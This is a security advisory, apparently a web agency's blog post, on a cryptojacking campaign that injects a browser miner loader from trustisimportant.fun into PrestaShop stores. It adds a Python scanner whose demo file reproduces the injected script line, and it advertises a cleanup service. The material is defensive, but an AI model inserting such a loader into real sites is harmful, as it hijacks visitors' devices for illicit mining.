[CRYPTOJACKING MALWARE WARNING FOR PRESTASHOP] Massive Malware attack using trustisimportant.fun to mine cryptocurrencies from PrestaShop online stores using customers’ CPU/GPU resources
At Liewebs, we have detected that for the past few days cybercriminals have been carrying out massive attacks on PrestaShop online stores. The attacks insert malicious code (Malware) into the website to mine cryptocurrency illegally, a practice also called cryptojacking. The attack uses the CPU/GPU resources of customers’ devices for these mining tasks through the web browser.
What is this cryptojacking cyber attack on PrestaShop online stores?
During these days, we have received a lot of requests for URGENT Technical Support from customers with PrestaShop stores that have suffered the same type of attack, so we assume that this is a massive action in a short period of time by these cybercriminals.
Unlike other similar attacks, this one is specially designed for the PrestaShop platform: it looks for specific files that are only found in this type of ecommerce platform and inserts the cryptojacking Malware into them.
The inserted Malware is basically JavaScript code executed on the client side, i.e. in the web browser. Below is a screenshot of the malicious code fragment:
The purpose of this code is to call the URL https://trustisimportant.fun/karma/karma.js?karma=bs?nosaj=faster.mo, from which a much more extensive script is loaded. That script mines cryptocurrency using the resources of the computers or devices of the visitors or customers browsing the website at that time. This type of Malware is called cryptojacking.
When a customer accesses the infected store, the Malware code is executed in his browser, starting to make use of all the CPU and GPU resources of the computer to perform these mining tasks. The immediate problem the customer is exposed to is that his computer starts to run out of available resources and overheat due to overuse. This could cause serious hardware damage if the browser is not closed in time.
Mining tasks require very powerful equipment with advanced cooling systems.
In effect, the store where the malicious code is located becomes a mere carrier of Malware, without it affecting you directly, except for the penalty you get from search engines when they detect that the website contains Malware. The attacker's benefit is the illicit use of the CPU and GPU resources of the computers of everyone who visits the infected website, which are put to work mining cryptocurrency for the attacker's economic gain. The most curious thing about this type of attack is that users are completely unaware that their computers are being used to mine cryptocurrencies; they only experience an increase in CPU and GPU usage and, as a consequence, a considerable rise in the temperature of these components.
You can read more about this type of Malware in the following article: Cryptocurrency mining malware.
The good news is that this type of attack is not designed to delete website data or steal sensitive data from online store users, such as credit/debit card details, personal information, etc… In fact, most PrestaShop online store owners have been able to find out about it through online Malware analysis tools such as Sucuri and others.
In the case of Sucuri, we can guarantee that it detects this type of cyber-attacks, so if you are a PrestaShop online store owner, and you don’t know if you could have been infected by this Malware, we recommend you to take the free scan they offer.
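A complementary server-side check, as an added example that is not from Liewebs or the original article: it walks a copy of the store's files, flags any reference to the trustisimportant.fun domain named above, and also lists external hosts that are not on an allowlist you supply. The scanned file extensions, the allowlist, and the sample file names and contents in `demo()` are assumptions constructed for illustration.

```python
import os
import re
import tempfile

IOC_DOMAIN = "trustisimportant.fun"          # indicator named in this article
SCAN_EXT = {".js", ".tpl", ".php", ".html"}  # assumption: file types worth checking
# Absolute or protocol-relative URL; group 1 is the host. Triage only:
# a comment such as "//foo.bar" would also match and need manual review.
URL_RE = re.compile(r"(?:https?:)?//([a-z0-9.-]+\.[a-z]{2,})", re.I)

def scan_store(root, allowed_hosts=()):
    """Return sorted (relative_path, line_no, host, reason) findings."""
    allowed = {h.lower() for h in allowed_hosts}
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if os.path.splitext(name)[1].lower() not in SCAN_EXT:
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                for no, line in enumerate(fh, 1):
                    for host in URL_RE.findall(line):
                        host = host.lower()
                        if host == IOC_DOMAIN or host.endswith("." + IOC_DOMAIN):
                            reason = "ioc"
                        elif host not in allowed:
                            reason = "unlisted-host"
                        else:
                            continue
                        findings.append((os.path.relpath(path, root), no, host, reason))
    return sorted(findings)

def demo():
    """Build a constructed mini store tree (not real PrestaShop files) and scan it."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "js"))
        with open(os.path.join(root, "js", "sample.js"), "w") as fh:
            fh.write("var a = 1;\n"
                     "var s = document.createElement('script');\n"
                     "s.src = 'https://trustisimportant.fun/karma/karma.js?karma=bs?nosaj=faster.mo';\n")
        with open(os.path.join(root, "header.tpl"), "w") as fh:
            fh.write('<script src="//cdn.example.com/lib.js"></script>\n'
                     '<script src="https://stats.example.net/t.js"></script>\n')
        return scan_store(root, allowed_hosts=["cdn.example.com"])

if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

An "unlisted-host" finding is only a prompt for review, while an "ioc" finding means the file should be compared against a clean copy of the same PrestaShop version.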
If you have been infected by this Malware, at Liewebs we can give you the best web disinfection service to completely neutralize this malicious code. We have a service of web disinfection and technical support 24 hours a day, 365 days a year.
Recommendations to prevent your website or PrestaShop store from being infected by Malware
The mere fact that your website or online store is visible on the Internet exposes it to attack by cybercriminals. The probability of an attack increases in direct proportion to the website's traffic and its visibility on the Internet.
One of the best recommendations is to have a professional team, such as the one at Liewebs, perform monthly maintenance tasks so that online stores are always protected by strong security policies and the appearance of vulnerabilities is minimized.
Here are our general recommendations for all PrestaShop online store or website owners:
How to disinfect and completely remove this Malware
We have at your disposal a special service to search for and completely remove the codes inserted by this cryptojacking Malware. We restore the normal operation of your store and completely eliminate this threat. The service includes urgent priority.